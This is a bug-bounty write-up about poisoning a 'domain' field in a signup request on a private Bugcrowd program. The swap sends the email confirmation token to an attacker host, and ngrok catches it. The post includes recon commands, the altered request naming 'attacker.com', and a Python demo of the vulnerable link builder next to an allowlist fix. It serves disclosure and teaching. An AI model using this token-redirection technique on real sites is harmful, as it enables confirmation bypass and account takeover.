Greetings everyone! I am Pallab (Twitter: @PJBorah2). Today I am going to share my first accepted P2 bug, found on a Bugcrowd private program: a host header poisoning issue that leaked the email confirmation token and let me bypass the account confirmation flow of the target domain.
While hunting on the target site xyz.com, the first thing I did was my recon process. I tried to gather all the subdomains with subfinder and httpx together, collecting every subdomain along with its status code. After running the two tools combined, I only looked at hosts returning 200 and 302 responses.
subfinder -d target.com -silent | httpx -title -content-length -status-code
That gave me the list of subdomains, which I filtered down to those with a 200 or 302 response. I spent about a day on this, at least two hours per subdomain, and after moving on from a few of them I picked one that looked like ground.xyz.com.
This host had account creation functionality. Before creating an account I always gather some information first, and the tools I used were:
For directory search: ffuf, dirsearch, wfuzz
For content discovery: gau, ParamSpider, waybackurls, httpx, subfinder, sublist3r
Once I had gathered information about the target, I started testing the domain. Now let's skip everything else and reproduce how I was able to steal the email verification token through host header poisoning: the server builds the confirmation link from a domain value supplied by the client.
Steps to reproduce:
Step 1:
I visited https://ground.target.com/, created a new account, filled in the form with a victim email address that I am not authorized to use, and captured the request with Burp.
Step 2:
In the request I saw that the functionality was based on a third-party API service, but the request carried the original domain in a "domain" parameter, as you can see in the request below:
{"key":"eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw",
"template_id":"xyz","domain":"ground.xyz.com"}
I then changed the request so that the domain pointed at a host I control:
{"key":"eyJwayI6NDc2MjEzLCJlbWFpbCI6ImFwa3Jzb2x1dGlvbnNAZ21haWwuY29tIn0:1k4Qwz:7LIEOO8iu-abVU3h1LoM6HUAFkw",
"template_id":"xyz","domain":"attacker.com"}
So I replaced the domain with the attacker domain and forwarded the request.
Step 3:
I used an ngrok server to capture the incoming request. The confirmation token leaked to my supplied server when the victim clicked the link in the email, since the link had been built with my domain.
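To make the root cause concrete, here is an added example that is not code from the original post or from the affected program. It models the bug in a few lines of Python: the server signs the user's id and email into a key, then builds the confirmation link from the "domain" field of the request body, so whoever controls that field decides where the token is sent. The signing secret, the host names, the user data and the simplified key format (base64url JSON plus an HMAC, standing in for the real signed key seen in the captured request) are all constructed for the demo. The hardened builder ignores the client-supplied host unless it is on a server-side allowlist.

```python
# Added example (not from the original post or the affected program).
# Models the bug: the confirmation link host is taken from the request body.
# All secrets, hosts and user data below are constructed for the demo.
import base64
import hashlib
import hmac
import json
from typing import Optional
from urllib.parse import parse_qs, urlsplit

SECRET = b"constructed-demo-secret"    # assumption: server-side signing key
CANONICAL_HOST = "ground.xyz.com"      # host the link should always use
ALLOWED_HOSTS = {CANONICAL_HOST}       # allowlist for multi-host deployments


def make_token(user_id: int, email: str) -> str:
    """Sign {"pk": ..., "email": ...} as base64url(json):hexsig.

    Simplified stand-in for the signed key format in the captured request."""
    claims = json.dumps({"pk": user_id, "email": email}, separators=(",", ":"))
    payload = base64.urlsafe_b64encode(claims.encode()).rstrip(b"=").decode()
    sig = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}:{sig}"


def verify_token(token: str) -> Optional[dict]:
    """Return the signed claims if the signature is valid, otherwise None."""
    try:
        payload, sig = token.rsplit(":", 1)
    except ValueError:
        return None
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def build_link_vulnerable(body: dict) -> str:
    """The pattern from the writeup: the link host comes straight from the request."""
    token = make_token(body["pk"], body["email"])
    return f"https://{body['domain']}/confirm?key={token}"


def build_link_hardened(body: dict) -> str:
    """Fix: the client never chooses the host. Use the canonical host, and only
    honour a requested host when it is on the server-side allowlist."""
    token = make_token(body["pk"], body["email"])
    requested = body.get("domain")
    host = requested if requested in ALLOWED_HOSTS else CANONICAL_HOST
    return f"https://{host}/confirm?key={token}"


def token_leaks(link: str) -> bool:
    """True if clicking the link would send the token to a host we do not trust."""
    return urlsplit(link).hostname not in ALLOWED_HOSTS


def token_from_link(link: str) -> str:
    """What the attacker's listener (ngrok in the writeup) recovers from the click."""
    return parse_qs(urlsplit(link).query)["key"][0]


if __name__ == "__main__":
    # Constructed request body mirroring the captured one, domain swapped to attacker.
    attacker_body = {"pk": 1, "email": "victim@example.com", "domain": "attacker.com"}
    vuln = build_link_vulnerable(attacker_body)
    safe = build_link_hardened(attacker_body)
    print("vulnerable:", vuln, "| leaks:", token_leaks(vuln))
    print("hardened:  ", safe, "| leaks:", token_leaks(safe))
    print("attacker recovers claims:", verify_token(token_from_link(vuln)))
```

Running the script shows the vulnerable link pointing at attacker.com and the hardened one at ground.xyz.com for the same request. The point of `token_leaks` is that the signature on the key is irrelevant here: the token is perfectly valid, it is simply delivered to the wrong party, so fixing the signing scheme would not help. The fix has to be on the host selection.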
I submitted this vulnerability with a full proof of concept and was awarded points, since it was a points-only Bugcrowd private program.
Thank you, I hope you enjoyed it!
Stick with me on Twitter: PJBorah2
LinkedIn: Pallab Jyoti Borah